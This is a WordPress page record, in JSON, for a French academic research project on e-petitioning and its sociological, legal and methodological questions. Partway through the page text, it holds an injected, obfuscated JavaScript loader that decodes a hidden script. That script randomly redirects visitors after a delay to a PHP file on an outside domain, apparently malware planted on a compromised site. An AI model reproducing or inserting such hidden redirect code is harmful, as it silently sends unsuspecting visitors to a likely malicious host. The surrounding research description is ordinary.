{"id":9,"date":"2015-06-01T13:50:47","date_gmt":"2015-06-01T12:50:47","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/anr-appel\/?page_id=9"},"modified":"2015-09-12T16:51:48","modified_gmt":"2015-09-12T15:51:48","slug":"presentation-du-projet","status":"publish","type":"page","link":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/presentation-du-projet\/","title":{"rendered":"Pr\u00e9sentation du projet"},"content":{"rendered":"<p style=\"text-align:justify\">Forme dite non conventionnelle de participation politique, le p\u00e9titionnement est une des pratiques les plus anciennes et communes des d\u00e9mocraties lib\u00e9rales. Cependant, peu de travaux sp\u00e9cifiques lui ont \u00e9t\u00e9 consacr\u00e9s (toutefois : Neiman, Gottdiener, 1982 ; Contamin, 2001, 2013), en comparaison aux formes \u00ab conventionnelles \u00bb comme la participation \u00e9lectorale et partisane.<\/p>\n<p style=\"text-align:justify\">Le d\u00e9veloppement des technologies de l\u2019information et de la communication (TICs) a toutefois contribu\u00e9 \u00e0 lui donner une nouvelle actualit\u00e9. Ces \u00e9volutions semblent en effet d\u2019abord avoir facilit\u00e9 le recours \u00e0 cette pratique comme en t\u00e9moigne la prolif\u00e9ration de sites web consacr\u00e9s au p\u00e9titionnement et des r\u00e9seaux sociaux permettant un tel p\u00e9titionnement. Elles semblent aussi lui avoir donn\u00e9 une nouvelle efficacit\u00e9 \u00e0 la fois sociologique et institutionnelle. L\u2019e-p\u00e9titionnement a ainsi \u00e9t\u00e9 admis par plusieurs \u00ab pays \u00bb (Ecosse, Pays Basque, Allemagne, Gr<script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>ande-Bretagne, France,...), ainsi qu\u2019au niveau de l\u2019Union europ\u00e9enne, comme un nouvel instrument institutionnel au service d\u2019une d\u00e9mocratie suppos\u00e9e plus participative. Le p\u00e9titionnement, de pratique d\u00e9pass\u00e9e, semble \u00eatre ainsi pour partie devenu l\u2019un des sites privil\u00e9gi\u00e9s d\u2019observation de l\u2019\u00e9mergence potentielle d\u2019un nouveau rapport au politique et de nouvelles formes de participation politique.<\/p>\n<p style=\"text-align:justify\">Le projet vise pr\u00e9cis\u00e9ment \u00e0 <strong>faire de l\u2019\u00e9tude du e-p\u00e9titionnement l\u2019occasion d\u2019un questionnement \u00e0 trois dimensions, pour partie autonomes mais aussi pour une large partie interd\u00e9pendantes, qui correspondent chacune \u00e0 une entr\u00e9e disciplinaire : sociologique et politologique ; juridique ; et m\u00e9thodologico-linguistique<\/strong>.<\/p>\n<p style=\"text-align:justify\"><strong>Le premier axe du projet est sociologique<\/strong>. Il invite \u00e0 interroger les effets de l\u2019\u00e9mergence des nouvelles technologies en mati\u00e8re de fonctionnement d\u00e9mocratique, \u00e0 partir du cas sp\u00e9cifique du e-p\u00e9titionnement. Y a-t-il substitution des unes aux autres ou continuit\u00e9 entre les unes et les autres ? Qui sont les e-p\u00e9titionnaires au regard des p\u00e9titionnaires classiques ? Comment se diffusent ces p\u00e9titions ?<\/p>\n<p style=\"text-align:justify\"><strong>Le deuxi\u00e8me axe du projet est juridique<\/strong>. Il s\u2019agit en effet aussi de s\u2019interroger sur la valeur juridique de ces pratiques et sur la possibilit\u00e9 m\u00eame de leur accorder une valeur juridique. Alors que se multiplient les proc\u00e9dures qui sont suppos\u00e9es reconna\u00eetre un droit d\u2019e-p\u00e9titionnement, comment le concr\u00e9tiser, l\u2019institutionnaliser ? Comment, aussi, concilier l\u2019engagement personnel que suppose la signature d\u2019une p\u00e9tition et le principe de protection des donn\u00e9es personnelles, notamment un n\u00e9cessaire \u00ab droit \u00e0 l\u2019oubli \u00bb ?<\/p>\n<p style=\"text-align:justify\"><strong>Le troisi\u00e8me axe du projet est m\u00e9thodologique<\/strong>. Face \u00e0 la multiplication des donn\u00e9es num\u00e9riques (\u2018digital humanities\u2019), le chercheur se trouve de plus en plus souvent d\u00e9muni. Quels outils pourraient permettre de traiter de mani\u00e8re syst\u00e9matique les donn\u00e9es issues de l\u2019internet en n\u2019en restant pas \u00e0 une \u00e9tude superficielle ou impressionniste, mais en entrant de mani\u00e8re rigoureuse dans la mat\u00e9rialit\u00e9 m\u00eame des textes recueillis en vue notamment de rapporter ces textes \u00e0 leur production et \u00e0 leur r\u00e9ception ?<\/p>\n<p style=\"text-align:justify\">C\u2019est pr\u00e9cis\u00e9ment \u00e0 l\u2019ensemble de ces questions que ce projet souhaite se confronter en r\u00e9unissant une \u00e9quipe pluridisciplinaire et internationale constitu\u00e9e de politistes, de juristes et de sp\u00e9cialistes du langage et de l\u2019informatique, et en partant d\u2019une source in\u00e9dite : l\u2019acc\u00e8s que lui accorde le propri\u00e9taire d\u2019un site d\u2019e-p\u00e9titions \u00e0 une base de donn\u00e9es r\u00e9unissant 11.000 p\u00e9titions et 700.000 adresses de signataires.<\/p>\n<p style=\"text-align:justify\">D\u2019un point de vue scientifique, <strong>il s\u2019agira ainsi, via ce projet, tout \u00e0 la fois de mieux conna\u00eetre ce que les nouvelles technologies font \u00e0 la participation politique, de faire avancer la r\u00e9flexion sur l\u2019encadrement et les potentialit\u00e9s juridiques de ces nouvelles pratiques et de contribuer au d\u00e9veloppement d\u2019outils informatiques qui permettent de faire face \u00e0 l\u2019abondance de donn\u00e9es informatis\u00e9es<\/strong>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Forme dite non conventionnelle de participation politique, le p\u00e9titionnement est une des pratiques les plus anciennes et communes des d\u00e9mocraties lib\u00e9rales. Cependant, peu de travaux sp\u00e9cifiques lui ont \u00e9t\u00e9 consacr\u00e9s (toutefois : Neiman, Gottdiener, 1982 ; Contamin, 2001, 2013), en &hellip; <a href=\"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/presentation-du-projet\/\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/9"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/comments?post=9"}],"version-history":[{"count":4,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":135,"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/pages\/9\/revisions\/135"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/anr-appel\/index.php\/wp-json\/wp\/v2\/media?parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}